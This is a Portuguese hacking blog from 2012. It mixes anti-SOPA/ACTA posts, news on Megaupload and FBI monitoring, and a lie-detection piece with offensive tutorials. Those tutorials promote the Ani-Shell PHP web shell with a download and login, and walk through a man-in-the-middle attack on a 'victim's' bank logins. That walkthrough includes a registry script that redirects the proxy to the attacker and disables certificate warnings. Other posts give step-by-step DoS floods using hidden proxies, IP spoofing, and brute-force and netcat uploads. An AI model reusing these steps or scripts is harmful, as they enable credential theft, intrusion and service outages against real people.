terça-feira, 31 de janeiro de 2012

A.C.T.A - Acordo Comercial Anticontrafação


Os governos estão querendo acabar com a internet que conhecemos, criar monopólios... O ACTA e uma versão internacional do SOPA e do PIPA são uma ameaça aos direitos fundamentais e o acesso ao conhecimento.

Anda sendo negociado em segredo:

  • Transformaria provedores de Internet em uma polícia dos direitos autorais privados.
  • Iria impor penas severas e injustas sobre os usuários e consumidores.
  • Traria danos ao acesso a medicamentos e ao conhecimento essencial nos países pobres.
  • Inibiria a inovação.
  • Estabeleceria novos parâmetros anti-democráticos passando por cima dos parlamentos.


segunda-feira, 30 de janeiro de 2012

Ani-Shell v1.5



Ani-Shell é um simples shell em PHP com algumas características únicas, como Mass Mailer, um simples Fuzzer Web Server, um DDoS e muito mais. Esta shell tem imensas capacidades e têm sido desenvolvida com alguns padrões de codificação em mente para melhor edição e personalização.



Algumas de suas funções:

Shell
Mass Mailer
DDos
Web-Server Fuzzer
Uploader
Design
Login
Mass Code Injector (Appender and Overwriter)
Encoded Title
Back Connect
Bind Shell
Lock Mode Customisable
Tracebacks (email alerts)
PHP Evaluate
PHP MD5 Cracker
Anti-Crawler
Mass Deface



Novidades nesta versão :,


Better CSS
Intelligent File Manager
Auto Rooter
PHP Obfuscater
Google Dork Creator
Zip Downloader (Download de qualquer arquivo direto do  webserver)
Fixed the Memory Exhausted Error in MD5 Cracker



Download:

http://sourceforge.net/projects/ani-shell/



Login: lionaneesh

Senha: lionaneesh

Ref: http://unknownantisec.wordpress.com/

domingo, 29 de janeiro de 2012

FBI vai monitorar Redes Sociais



O Federal Bureau of Investigation está à procura de uma maneira melhor para espionar os usuários do Facebook e Twitter. O Bureau é pedir às empresas para construir um software que pode efetivamente verificar a mídia social online para palavras significativas, frases e comportamento para que os agentes podem responder.A de papel postado no site do FBI pede para as empresas para construir programas que irá mapear o sentimento e as injustiças.


“O pedido deve ser infinitamente flexível e ter a capacidade de se adaptar rapidamente às mudanças ameaças para manter a vantagem estratégica e tática”, o Pedido de Informação disse: “O objetivo desse esforço é para cumprir os objectivos delineados para o reforço … [de ] consciência FBI SOIC da situação global e decisão estratégica melhor tomada. “A ferramenta seria usada em” missões Reconnaisance e vigilância, Eventos especiais de Segurança Nacional (NSS) planejamento, operações NSSE, operações SOIC, a inteligência contra o terrorismo, e muito mais.


Embora a polícia, incluindo na Grã-Bretanha, já utilizam o Facebook rotineiramente para averiguar o paradeiro de criminosos, automaticamente filtrar informações irrelevantes permanece desafiador. A nova aplicação do FBI vai ser capaz de automaticamente destacar as informações mais relevantes. O FBI está a procurar respostas até 10 de Fevereiro.


Fonte: http://hackersec.blogspot.com/


Algumas ferramentas para monitoração das redes sociais já são disponibilizadas para todos e gratuitamente :


Hashtags : Ferramenta para monitoração de hashtags no twitter.


Trendistic : Busca pela palavra e cria um gráfico em tempo real, mostrando quantos tuítes mencionaram o termo nas últimas horas.


Twilert : Enviam emails de alerta cada vez que uma certa palavra ou termo, escolhido pelo usuário, é postado no microblog.


E o serviço pago que o FBI está de olho é o Social Media Monitor que da a possibilidade de monitorar diversas palavras ao mesmo tempo, ele faz o mesmo serviço do Scup e o Sharing for Social .

quinta-feira, 26 de janeiro de 2012

Anonymous - A Verdade!



Agora é cada um com suas conclusões!

sábado, 21 de janeiro de 2012

Acompanhando os ataques DDoS em tempo real pelo site da Akamai

Quer acompanhar os ataques DDoS que estão rolando pelo mundo e tempo real ? Então acessem o site da Akamai - http://www.akamai.com/html/technology/dataviz1.html
Vejam como as coisas estão feitas neste momento:


 
Essa noite promete e muito. :)

Lista de empresas que apoiam a lei S.O.P.A.

   
    @BAE_M4573R
    
    EMPRESAS QUE APOIAM O S.O.P.A,
   
    60 Plus Association
    ABCAlliance for Safe Online Pharmacies (ASOP)
    American Federation of Musicians (AFM)
    American Federation of Television and Radio Artists (AFTRA)
    American Society of Composers, Authors and Publishers (ASCAP)
    Americans for Tax ReformArtists and Allied Crafts of the United States
    Association of American Publishers (AAP)
    Association of State Criminal Investigative Agencies
    Association of Talent Agents (ATA)
    Baker & Hostetler LLPBeachbody, LLC
    BMI
    BMG Chrysalis
    Building and Construction Trades Department
    Capitol Records Nashville
    CBS
    Cengage Learning
    Christian Music Trade Association
    Church Music Publishers’ Association
    Coalition Against Online Video Piracy (CAOVP)
    Comcast/NBCUniversal
    Concerned Women for America (CWA)
    Congressional Fire Services Institute
    Copyhype
    Copyright Alliance
    Coty, Inc.Council of Better Business Bureaus (CBBB)
    Council of State Governments
    Country Music Association
    Country Music Television
    Covington & Burling LLP
    Cowan, DeBaets, Abrahams & Sheppard LLP
    Cowan, Liebowitz & Latman, P.C.
    Creative America
    Davis Wright Tremaine LLP
    Deluxe
    Directors Guild of America (DGA)
    Disney Publishing Worldwide, Inc.
    Elsevier
    EMI Christian Music Group
    EMI Music Publishing
    ESPN
    Estée Lauder Companies
    Fraternal Order of Police (FOP)
    Go Daddy
    Gospel Music Association
    Graphic Artists Guild
    Hachette Book Group
    HarperCollins Publishers Worldwide, Inc.
    HyperionIndependent Film & Television Alliance (IFTA)
    International Alliance of Theatrical and Stage Employees (IATSE)
    International AntiCounterfeiting Coalition (IACC)
    International Brotherhood of Electrical Workers (IBEW)
    International Brotherhood of Teamsters (IBT)
    International Trademark Association (INTA)
    International Union of Police Associations
    Irell & Manella LLP
    Jenner & Block LLP
    Kelley Drye & Warren LLP
    Kendall Brill & Klieger LLP
    Kinsella Weitzman Iser Kump & Aldisert LLP
    L’Oreal
    Lathrop & Gage LLP
    Loeb & Loeb LLP
    Lost Highway Records
    Macmillan
    Major County Sheriffs
    Major League Baseball
    Majority City Chiefs
    Marvel Entertainment, LLC
    MasterCard Worldwide
    MCA Records
    McGraw-Hill Education
    Mercury Nashville
    Minor League Baseball (MiLB)
    Minority Media & Telecom Council (MMTC)
    Mitchell Silberberg & Knupp LLP
    Morrison & Foerster LLP
    Motion Picture Association of America (MPAA)
    Moving Picture Technicians
    MPA – The Association of Magazine Media
    National Association of Manufacturers (NAM)
    National Association of Prosecutor Coordinators
    National Association of State Chief Information Officers
    National Cable & Telecommunications Association (NCTA)
    National Center for Victims of Crime
    National Crime Justice Association
    National District Attorneys Association
    National Domestic Preparedness Coalition
    National Football League
    National Governors Association, Economic Development and Commerce Committee
    National League of Cities
    National Narcotics Offers’ Associations’ Coalition
    National Sheriffs
    Association (NSA)
    National Songwriters Association
    National Troopers Coalition
    News Corporation
    Patterson Belknap Webb & Tyler LLP
    Pearson Education
    Penguin Group (USA), Inc.
    Pharmaceutical Research and Manufacturers of America (PhRMA)
    Phillips Nizer, LLPPfizer, Inc.
    Proskauer Rose LLP
    Provident Music Group
    Random House
    Raulet Property Partners
    Republic Nashville
    Revlon
    Robins, Kaplan, Miller & Ciresi LLPScholastic, Inc.Screen Actors Guild (SAG)
    Shearman & Sterling LLP
    Showdog Universal Music
    Simpson Thacher & Bartlett LLP
    Skadden, Arps, Slate, Meagher & Flom LLP
    Sony/ATV Music Publishing
    Sony Music Entertainment
    Sony Music Nashville
    State International Development Organization (SIDO)
    The National Association of Theatre Owners (NATO)
    The Perseus Books Groups
    The United States Conference of Mayors
    Tiffany & Co.
    Time Warner
    4Ultimate Fighting Championship (UFC)
    UMG Publishing Group Nashville
    United States Chamber of Commerce
    United States Tennis Association
    Universal Music
    Universal Music Publishing Group
    Viacom
    Visa, Inc.
    W.W. Norton & Company
    Warner Music Group
    Warner Music Nashville
    White & Case LLP
    Wolters Kluewer Health
    Word Entertainment
    Warner Music Group
    Warner Music Nashville
    White & Case LLP
    Wolters Kluewer Saúde
    Word Entertainment

quinta-feira, 19 de janeiro de 2012

Site Megaupload sai do ar após denúncias de pirataria

Presos pelo FBI, funcionários do serviço podem passar 20 anos na cadeia

Sete pessoas responsáveis pelo site Megaupload foram presas nesta quinta-feira pelo Departamento de Justiça dos Estados Unidos e pelo FBI. De acordo com o comunicado divulgado pelas agências, os operadores da página são acusados de colaborar com a pirataria de conteúdo protegido e lavagem de dinheiro – se condenados, os responsáveis podem pegar até 20 anos de prisão.

“Sites como o Megaupload, por exemplo, já custaram mais de meio bilhão de dólares aos proprietários de direitos autorais no país”, explicou o Departamento de Justiça no relatório emitido após a operação. “Nosso objetivo foi apontar o uso indevido de um site de armazenamento de conteúdo público para cometer crimes de propriedade intelectual.”

A página em questão era utilizada para o armazenamento de arquivos na rede. O que chamou a atenção do FBI foi a crescente adição ao serviço de conteúdo como filmes e músicas protegidas por leis de direito autoral – abertamente distribuídos aos usuários cadastrados, ou não, do serviço.

As prisões foram efetuadas na Nova Zelândia, Alemanha e Estônia com o auxílio das autoridades locais. Entre os presos está o neozelandês Kim Schmitz, também conhecido como “Kim Dotcom”, responsável pela administração do site. Aproximadamente 50 milhões de dólares em ativos da empresa foram apreendidos na operação.


Entenda o projeto de lei SOPA / PIPA e como isso pode lhe afetar


senado americanos vai votar día 24 de janeiro, um projeto de lei que está sendo conhecido na internet como SOPA e PIPA, que dá direito às indústrias de entretimento solicitar intervenção diretamente a qualquer site que veicule qualquer tipo de propriedade intelectual de terceiros. Tá, e eu com isso, problema dos americanos? Não é bem assim, principalmente quando se fala de internet, o mundo é totalmente inter-relacionado.
Hoje site como a Wikipedia, Boingboing e WordPress fizeram “blackouts” em seu site como forma de protesto.
Assista o vídeo abaixo e entenda.


Ref. BAE M4573R

quinta-feira, 12 de janeiro de 2012

A técnica Man-in-the-Middle



Imagine uma situação onde você está conectado ao site do seu banco. Aparentemente tudo certo, Firewall Ativo, antivírus também rodando perfeitamente, você está vendo o famoso cadeadinho na barra de status do seu navegador indicando que o site é seguro, também está vendo o protocolo https na barra de endereço, nada de anormal, você tem toda a certeza este é o verdadeiro site do seu banco e realmente é. Mas em poucos dias você percebe que a sua conta bancária está ZERADA, ai você se pergunta:
O que aconteceu, se eu tomei todos os cuidados antes de entrar com a minha senha!? ...
Onde estava o erro afinal?
Será que havia um HOMEM-NO-MEIO?
A Técnica
Apesar de ser uma técnica relativamente fácil de ser feita, não deixa de ser uma técnica super poderosa. Muitos crackers à usam para fins maléficos como roubar senhas de clientes de bancos, mas a mesma pode ser usada por hackers para descobrir senhas de e-mails como por exemplo o Yahoo! Ou Hotmail que se tentássemos captura-las por técnicas de sniffing não obteríamos nada legível. Neste artigo irei mostrar como os crackers capturam senhas de bancos on-line para demonstrar que os famosos tecladinhos virtuais são facilmente burlados apesar de toda a sua fama de seguro. Nenhuma forma de proteção existente nos dias de hoje é capaz de parar esta técnica.
Espero que nenhum de nossos leitores use o conhecimento aqui obtido para causar prejuízos a terceiros, uma vez que escrevi este artigo apenas para fins didáticos e não poderá ser usado como forma de incentivo a criminalidade. O que garante que eu possa passar este conhecimento para você sem está cometendo um crime é o artigo 5º da Constituição Federal que nos garante a Liberdade de Expressão.
Como funciona?
Veja a imagem a seguir, esta é uma representação de uma conexão normal, sem interceptações, e funciona de modo que o cliente passa os dados criptografados para o servidor e vice-versa, tornando assim impossível o uso de técnicas de sniffing para a capturados dados trocados entre o cliente e o servidor.

Abaixo segue uma representação de uma conexão interceptada, (usando a técnica Man-in-The-Middle), e funciona de modo que o hacker engana o cliente e o servidor. Engana o cliente se fazendo passar por um simples servidor de proxy, e engana o servidor se passando pelo próprio cliente, desta forma os dados chegam até o hacker em texto puro, pois os dois pensam que o hacker é uma fonte confiável.


Conhecendo o Anchiles
O Achiles nada mais é do que um simples servidor de proxy, que se usado de forma incorreta pode servir como uma poderosa ferramenta hacker, que nas mão de uma pessoa mal intencionada pode causar grandes prejuízos, uma verdadeira faca de dois gumes. Você pode usar outro programa semelhante mais vamos usar este no exemplo.

Configurando

Em seguida clique no botão com um sinal de play no achiles para iniciar o servidor de proxy, para confirmar se o Achiles realmente iniciou o servidor verifique na barra de status do programa se ele está como running como na figura abaixo.


Agora abra as janelas do cliente e do servidor, para abrir a janela do cliente basta clicar no botão do ícone C e para a abrir a janela do servidor basta clicar na janela com o ícone S e aogra o Achiles já está configurado vamos agora configurar a máquina alvo.

Preparando o computador alvo
Um dos grandes inconvenientes desta técnica é que precisamos ter acesso físico à máquina do alvo para fazermos algumas configurações para que a técnica dê certo ou então poderíamos escrever um controle ActiveX que quando o alvo entrasse em uma página contendo este controle malicioso feito pelo hacker, estas alterações fossem feitas no computador do alvo automaticamente, mas isto é uma área muito avançada e será estudada em um outro artigo, talvez.
Para preparar o computador do alvo siga os passos:

Etapa 1
Abra o Internet Explorer do alvo, clique no menu Ferramentas / Opções de Internet... E em seguida na aba Conexões e depois em Configurações da LAN.

Etapa 2
Tomando como exemplo a figura abaixo, na máquina do alvo marque a opção de número 01 e em seguida digite o seu IP no campo número 02 (você pode ver qual é o seu IP acessando http://www.ip-adress.com) e no campo de número 03 digite a porta que você especificou no achiles quando o configurava. Agora clique em OK e vá para a aba Avançadas.




Etapa 3
Na aba Avançadas role a drop-down até encontrar as opções no grupo Segurança:
Avisar quando o certificado do site for inválido
Avisar se os formulários submentidos estiverem sendo redirecionados

Pronto! Agora é só esperar que o alvo acesse site e digite seus dados (login e senha), e logo aparecerá na janela de Cliente do Achiles. Na janela do servidor você poderá ver as respostas que o servidor está dando para o cliente, use com cuidado!
Script automatizado
Vamos escrever um script que fará todo o trabalho pesado pra você, ele fará toda a configuração mostrada acima, automaticamente basta apenas executá-lo e pronto o computador da vítima já está preparado para a ser interceptado.
Abra o notepad e digite o seguinte código, (sem a numeração das linhas):
Windows Registry Editor Version 6.01 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings] "ProxyEnable"=dword:00000001 "ProxyServer"="127.0.0.1:8080" [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings] "WarnonBadCertRecving"=dword:00000000 "WarnOnPostRedirect"=dword:00000000
Em seguida salve o arquivo com a extensão .reg.
Como configurar o script
Para configurar este script é bastante simples basta você editar a linha de número 4 ("ProxyServer"="127.0.0.1:8080") no código do script colocando lá informações sobre o IP e porta do servidor de proxy que no caso é o IP do seu computador. No lugar de 127.0.0.1 você deverá digitar o seu IP e no lugar de 8080 você deverá digitar a porta pela qual o servidor do proxy vai se comunicar com o cliente, ficando assim "ProxyServer"="ip.do.seu.micro:porta".
O script está pronto! Agora é só você fazer com que o alvo o abra ou em um rápido acesso físico a máquina do mesmo você poderá executá-lo já que sua execução é bastante rápida.
Proteja-se
Se você perceber a internet extremamente lenta ou se for emitido algum aviso sobre o certificado de segurança inválido, quando você acessar alguma página segura como a página de um banco, desconfie! Pois você pode estar sendo mais uma vítima desta poderosa técnica. Crie o habito de checar as configurações de proxy (Ferramentas>Opções de Internet...) toda vez que for visitar sites de bancos ou passar informações sigilosas via internet, assim você ficará bem mais protegido.
Pode existir novas técnicas que aplicam o golpe Man-in-the-Maddle e softwares especificos para o feito, então sempre se mantenha atualizado sobre isto.

Travando tudo



Existem vários tipos de ataques nesta modalidade, eu vou tentar resumir muito aqui toda essa abordagem a estas técnicas e para que você conheça rapidamente as características de cada um.
E estes tipos de ataques podem ser aplicados a qualquer versão do Windows, claro que isso também irá depender da força do ataque podendo se precisar de uma botnet (rede de computadores controlada por você) em algunsh casos.
Agora imdependente do tipo de ataque utilizado poderemos chamar a maioria destes tipos de ataques como DoS (Denial of Service). O DoS é um ataque que se baseia na recusa de serviço. Uma rede com conexão Web, ou rede interna (no caso dos sabotadores) com uma conexão muito boa envia um grande número de pacotes, quanto mais pacotes e mais fragmentados, lógicamente melhor ai então uma máquina alvo que não consiga interpretar o grande número de pacotes recebidos será a causa da recusa de serviço, derrubando os serviços nela hospedados, e é muito importante salientar as expressões "grande número" e "pacotes fragmentados". Ataques deste tipo, lançados por longos períodos de tempo e de forma sistemática são capazes até mesmo de derrubar firewalls bem configurados que, simplesmente, cumpram sua função - negar conexões não autorizadas - até que o sistema entre em pane. Vamos iniciar o artigo agora.
UDP Flood
Um ataque de inundação UDP (UDP flood) é um ataque de negação de serviço (ou DoS) utilizando o protocolo UDP para causar a perda de conexão do computador. Lembra-se de quando seu servidor ou estação de trabalho sai da rede?. Pode ser uma inundação UDP.

Pacotes UDP (User Datagram Protocol) não são orientados a conexão, ou seja, não há uma relação durável entre os pacotes enviados a porta de uma máquina remota. O UDP precisa apenas saber que existe uma porta, interface e host (máquina) para receber o pacote enviado da sua interface-fonte, e apenas isso já o satisfaz. Por isso que UDP não é um protocolo seguro e se você quiser cuidar da segurança de sua rede adicionar regras rígidas ao seu firewall em relação a este protocolo, ou o desative. Interfaces que recebem pacotes UDP também não necessitam criar uma relação durável com o emissor, seguindo a política deste. Na verdade, eles podem inclusive receber conexões de mais de uma fonte de pacotes UDP, utilizando o mesmo socket, recebendo pacotes e novos destinatários de forma indefinida. Um prato cheio para um ataque hacker.
Um ataque desse tipo costuma ser iniciado através do envio de um grande número de pacotes UDP para as portas aleatórias em uma máquina remota. Uma implementação simples e manual dessa técnica pode ser realizada com a ajuda do hping, uma poderosa ferramenta em linha de comando que ultrapassa em muito as funcionalidades do tradicional ping do Windows (e do Linux também). O hping pode ser obtido em sua versão Linux no endereço 
http://www.hping.org, para versão Windows não custa fuçar no site ou no Google certo? Mas será necessária a compilação. Existe também uma suite de programas chamada Net Tools, lá no menu Network Tools você terá o UDP flooder o download pode ser feito no site oficial em http://mabsoft.com (em Data, já no UDP flooder do Net Tools, use o formato de dado %3DLVI%26its%3DI%26otn%3D1, isto proporcionará um ataque razoavelmente potente).


HTTP ou SYN Flood

Evidente que o ataque anterior (UDP flood) apenas causaria incômodos ou tiraria do ar ocasionalmente, mas não é capaz de tirar um servidor robusto ou um website inteiro do ar. Mas um HTTP flood pode.

Um HTTP flood nada mais é que um SYN flood com destino certo para a porta 80 (porta da Internet) de uma máquina, servidor ou roteador. Os pacotes SYN são pacotes de sincronismo, responsáveis por dar o primeiro passo para iniciar qualquer conexão numa rede TCP/IP.
Nessa modalidade, um cliente requisita uma conexão enviando um SYN (synchroniza) ao servidor. O servidor, por sua vez, confirma esta requisição mandando um SYN-ACK (acknowledge) de volta ao cliente. O cliente, por sua vez, terminando o processo que costuma ser chamado de Three-Way Handshake (Aperto de mão em três etapas), avisa que a conexão está por fim estabelecida, por meio de um pacote ACK.

Um ataque SYN ou HTTP flood ocorre de uma forma muito simples: o pacote ACK jamais é enviado, o que faz com que o servidor espere por ele. Ao mesmo tempo, outras dezenas ou centenas de requisições são enviadas nos mesmos moldes e com o mesmo defeito. Foi um ataque semelhante a esse que derrubou o serviço do Twitter em 06 de agosto de 2009. O Net Tools que mencionei anteriormente possui uma ferramenta de HTTP Flood, mas que não funciona. Por isso, você pode optar por utilizar uma ferramenta famosa como Port Scanner e sistemas de pen test, mas que é capaz de gerar ataques DoS melhores que os de muitas ferramentas hacker, se bem que isso não seja a sua (nem a nossa) intenção. Estamos falando do Shadow Security Scanner uma ferramenta russa que pode ser adquirida em: 
http://www.safety-lab.com/SSS.exe. Essa cópia do programa pode ser usada por 15 dias mas se você trabalha continuamente com pen tests e redes, vale à pena adquiri-la.
Depois de instalar o programa, inicie-o e ele irá se atualizar, configure um proxy após ele totalmente carregado para se utilizar e ocultar seu IP, mantenha a opção HTTP Proxy, entre em 
http://www.samair.ru/proxy/proxy-01.htm, uma famosa lista de proxys anônimos e gratuitos. Escolha a porta de conexão correspondente e preencha o resto, caso algum proxy não funcione, teste outros. Agora, abra a interface do programa, clique no ícone DoS Checker, a seguir, clique na opção HTTP Stress. Preencha o Host com o IP alvo, se for de sua rede tente o comando tracert no ms-dos. Agora ajuste os Threads, Delay e Packet size para o tamanho máximo (de um modo rápido para iniciar o ataque), clique em Start e observe a ação.

ARP Flood

O protocolo ARP (Address Resolution Protocol) foi desenvolvido para resolver o problema do mapeamento de endereços lógicos, em endereços físicos, em redes Ethernet baseadas em IP, mas não restritas apenas estes dois protocolos (caso das redes TCP/IP). O problema é que o protocolo ARP opera em broadcasting, ou seja, transmite para todas as estações da rede até encontrar o endereço para onde se destina. Além disso tem uma infraestrutura facilmente manipulável, o que torna o seu uso para ataques muito simples.

Vamos ver agora o ataque usando o WinArpAttacker, uma ferramenta perfeitamente legal (poe ser utilizada para testes de segurança), que também pode ser utilizada para fins destrutivos ou demoniacos, já que é capaz de encontrar IPs ativos na rede, identificar portas abertas em máquinas e direcionar um ataque ARP exatamente para o alvo escolido. O software pode ser baixado em: 
http://xfocus.net/tools/.
  1. Ao baixar o programa pode ser necessário instalar o Winpcap que deverá acompanhar o pacote rar do download;
  2. Abra o programa e localize na seta ao lado o botão Scan, clique nele, e selecione Scan Lan. (Claro que esta forma só mostrará apenas as máquinas habilitadas a receber pacotes de modo promíscuo, ou escutar os broadcastings da rede, para uma melhor configuração clique na seta ao lado do botão Scan e clique em Advanced;
  3. Surgirá a janela Scan, selecione a opção Scan local networks, selecione ali as redes presentes;
  4. Clique em Antsniff;
  5. Aperte Scan e o cache ARP da rede será revelado em minutos;
  6. Selecione o alvo, clique sobre a seta ao lado do botão ARP Attack e clique em Flood (equivalente a mil pacotes ARP com endereços aleatórios);
  7. Para realizar ataques mais fortes clique no botão Options, a seguir, clique sobre a aba Attack, na linha ARP Flood times (1-10,000,000) digite o valor: 10000000 (10 milhões);

E poderá existir mais opções de ataques e estratégias a serem tomadas nas configurações do software de ataque, mas não vamos nos aprofundar se não fica muito fácil, tente descobrir, faça o sentido "testar" valer a pena e é assim que se aprende.

O Mentiroso



Na engenharia social é bem comum o uso da mentira juntamente com a manipulação verbal ou chantagens, mas como descobrir ou se proteger das mentiras para não se tornar vítima de uma engenharia social ou até mesmo no dia-a-dia para saber quem mente pra você?. Simples, vamos ver algumas técnicas agora mesmo!
A mentira é usada em maioria das vezes pelos seres humanos, para proteger, esconder fatos e enganar, e muitas vezes aplicada na engenharia social para obter informações como nosso grande conhecido hacker Kevin Mitinick, mas existe formas de descobrir quem está mentindo.

A detecção de mentiras por conversa é muito difícil pois requer muita informação sobre a pessoa, sobre como é a voz dela e seu comportamento corporal durante uma verdade sendo contada e possíveis demonstrações de comportamento diferente quando conta mentira, então é um requerimento básico você conhecer sobre a pessoa como é feito por detetives para interrogar as pessoas perguntando primeiramente seu nome, para saber como ele reage respondendo uma verdade. Agora como comentário rápido, para detectar mentiras em crianças é fácil qualquer um pode saber quando o pequeno(a) está mentindo, mas a partir dos 7 e 8 anos a comunicação começa a ficar mais aprimorada então a criança passa a saber mentir melhor.

A sabedoria popular mostra algumas dicas de como detectar mentiras como visto em filmes e novelas (não que eu assista novelas hehe) que seria o famoso olhar para o lado meio que procurando algo para dizer, mas isso não quer dizer que se uma pessoa olhar fixamente à você ela estará dizendo a verdade, pessoas mentem com frequência não importa quem seja todos mentem e podem domar o olho a olhar fixamente demonstrando confiança sobre o assunto tido e mentido. Mas claro que esse modo de detecção de mentira está sendo ultrapassado pois qualquer um pode dominar o olhar para mentir agora com alguns treinos e tentativas e nada será percebido quando fazem isso, por isso vou mostrar outras técnicas interessantes sobre o assunto.

Os dados

A conversação entre uma pessoa e outra é trocada através de palavras nas quais irei chamar de dados agora, e os dados que essa pessoa mentirosa passa durante a conversa geralmente caso for uma mentira acabam sendo superficiais, sem muitos detalhes ou aprofundamento do mesmo, e quando é solicitada alguma informação extra sobre o assunto o mentiroso muda o comportamento visivelmente ou se você perguntar sobre algo que ele já disse, será visível o desconforto sobre repetir tal coisa que seria a mentira. E mentiroso tende a falar em termos gerais, emprega menos referência a si mesmo (eu, para mim, etc) e desvia a conversa para aspectos menos problemáticos do assunto. Emprega com muita frequência os termos "sinceramente" e "honestamente", fala lentamente com uma linguagem menos solta, mais rígida, seu tom de voz muda diferentemente de quando está contando uma verdade, parece mais tenso, levanta o queixo e aperta mais os lábios.

Por outro lado, as histórias contadas com sinceridade tendem a ser desordenadas e saltos temporários, são cheias de detalhes e referências e maneira que o contador se relaciona na história como "Ela disse......". Também contém comentários pessoais e detalhes estranhos.

Postura e comportamento

Vamos começar por partes, o comportamento do rosto de uma pessoa é bem interessante de se reparar pois é o ponto foco de uma conversa que tenha sua atenção, uma ótima regra para detectar mentiras sobre a face de uma pessoa é um sorriso que só envolve a boca (excluindo maçãs do rosto e olhos) e que se prolonga por muito tempo, é um grande alerta. Mas lembre-se, conheça a pessoa, pode ser comum dela esse comportamento então para isso existem outros modos de detectar a mentira que devem ser usados em conjunto.

O próximo passo é observar as mãos do individuo, o uso da mão para expressar o que diz vai de pessoa a pessoa, cada um tem sua forma de comportamento e uso de suas mãos para se expressar. Mas comummente pessoas que mentem reduzem os movimentos das mãos, de novo é importante saber sobre as condições de comportamento normais da pessoa para saber se houve uma mudança e essa mudança seja suspeita.

Agora podemos falar sobre os ombros, uma pessoa que mente gira o ombro enquanto fala, fica de lado, levanta mexe eles pra frente e pra trás parecendo mais um desconforto com algo, claro que não tão agudamente como parece que eu disse mais de uma forma leve que você irá perceber reparando bem.

Por fim, as pernas, os mentirosos assim como com as mãos, tendem a reduzir movimentos com as pernas, cruzar e descruzar os pés repentinamente quando se discute o tema da conversa mentida.

Finalização

Aplicando estas técnicas de forma rápida e sutil, analisando a pessoa, você poderá descobrir alguns mentirosos mas ainda ressalto em alto e bom som, conheça a pessoa, estude seu comportamento para saber mais sobre ela e poderá detectar dessa pessoa com quase 70% de certeza sobre a mentira ali contada, eu inspirei este artigo no seriado The Mentalist, no qual me agrado e algumas técnicas aqui ditas são empregadas pelo ator principal e comprovadas cientificamente válidas para uso, espero que tenha gostado e não deixe de participar do fórum.

IP Spoofing pelo Nmap


No contexto de redes de computadores, IP spoofing é uma técnica de subversão de sistemas informáticos que consiste em mascarar (spoof) pacotes IP utilizando endereços de remetentes falsificados.
Devido às características do protocolo IP, o reencaminhamento de pacotes é feito com base numa premissa muito simples: o pacote deverá ir para o destinatário (endereço-destino) e não há verificação do remetente não há validação do endereço IP nem relação deste com o router anterior (que encaminhou o pacote), assim, torna-se trivial falsificar o endereço de origem através de uma manipulação simples do cabeçalho IP.
Ambiente de estudo
Para termos uma boa noção de como o ataque funciona, nada melhor do que você fazer os testes em máquinas virtuais, então montei um pequeno laboratório para mostrar como o ataque funciona. Vamos lá :)

O cenário utilizado foi o seguinte:
  • 1° Linux Ubuntu com o IP: 192.168.1.129
  • 2° MS Windows XP com o IP: 192.168.1.149

Existem várias máquinas virtuais no mercado (VMware, VirtualBox, Virtual PC), utilizo VMware pois acho o seu funcionamento mais simples e rápido. Para quem não conhece o vmware, basta fazer uma rápida busca no google.

Ferramenta necessária
Indo direto ao ponto, a ferramenta que iremos utilizar aqui é o NMAP (Network Mapping). Para quem usa distros baseados no Debian/Ubuntu, basta instalar com o comando:
$ sudo apt-get install nmap


PS: Lembrando que o NMAP é uma ferramenta que roda em modo texto, mas também existe uma versão do Nmap modo gráfica que se chama Zenmap. Caso queira instalar em um sistema Debian ou derivados, basta rodar o comando:
$ sudo apt-get install zenmap


Prefiro o Nmap em modo texto, pois é mais divertido :)

Iniciando
Para que possamos ver o resultado do ataque, irei utilizar o "Valhala Honeypot", e deixá-lo rodando na porta 23 (telnet).

Agora vamos utilizar o nmap para fazer um scan simples para ver o que o honeypot irá mostrar.




$ nmap 192.168.1.149 -p 23 

E o honeypot pega nosso IP, exibindo a seguinte mensagem:


O IP 192.168.1.129 tentou invasão por telnet (conexão)

O que o IP Spoofing faz é fazer com o que honeypot veja outro endereço IP, um IP falso. Para quem possamos usar o IP Spoofing, usaremos a seguinte sintaxe:
$ nmap host-para-scan -S host-spoofado -e interface -p Porta


Onde irá ficar:
$ nmap 192.168.1.149 -S 192.168.1.100 -e eth0 -p 23



Ps: O endereço IP "192.168.1.100", é um endereço IP falso, criado para enganar o honeypot.

Depois de rodar o comando acima no nmap, vamos ver o log que o honeypot mostrou:
$ O IP 192.168.1.100 tentou invasão por telnet (conexão)



Viu? O honeypot não pegou o endereço IP real da máquina(192.168.1.149), essa tecnica se chama "IP Spoofing".

Finalizando e Links úteis
Espero que tenham gostado desse pequeno tutorial. Não tenho uma grande experiencia em escrever tutoriais, mas tentei deixar este aqui de fácil entendimento.

Os programas usados foram:
1° Nmap: 
http://nmap.org/ (Existe versões para Windows e Linux)
2° Valhala Honeypot: http://valhalahoneypot.sourceforge.net/  (Somente para M&)

quarta-feira, 11 de janeiro de 2012

Brute Forçe SSH - Medusa

O Medusa é uma ótima tool e o bom que ela ja vem por padrão no BackTrack, neste video tutorial estou demonstrando como fazer um brute forçe no SSH utilizando o Medusa.

Recomendo que assistam o video em HD para melhor visualização.



Exploração automatizada através do FastTrack

O FastTrack é uma ótima tool, capaz de fazer coisas muito interessantes...
Na internet existem muitos tutoriais ensinando como fazer uma exploração automatizada com FastTrack más através da GUI, a interface web do FastTrack, neste video tutorial estou mostrando como fazer isso por linha de comando mesmo, acho melhor assim.

Recomendo que assistam o video em HD para melhor visualização.



Fazendo scaneamento com Inguma

Recomendo que assistam o video em HD para melhor visualização.


Brute Forçe FTP com Hydra

Neste video estou demonstrando como fazer um ataque de brute forçe através do Hydra.


Recomendo que assistam o video em HD para melhor visualização.


Extraindo emails com Goog Mail

Esta tool ja vem por padrão no BackTrack...


Recomendo que assistam o video em HD para melhor visualização.

Gerando WordList com Crunch

O Crunch é uma ferramenta muito boa para geração de wordlist's, bom que na hora dos brute forçe não precisa ficar baixando wordlist e o bom que ja vem por padrão no BackTrack.

Recomendo que assistam o video em HD para melhor visualização.


Obtendo Informações do Alvo

Neste video tutorial estou fazendo uma demonstração bem básica de como pegar informações de um host, eu tinha feito esta video aula a pedido de um amigo meu e então dicidi por aqui no blog, ai dei exemplos simples de como usar algumas ferramentas...

Recomendo que assistam o video em HD para melhor visualização.


Upload Netcat

Fazendo upload do netcat atravez do Metasploit Framework no BackTrack e conectando com ele...


Recomendo que assistam o video em HD para melhor visualização.



Novas técnicas de Engenharia Social



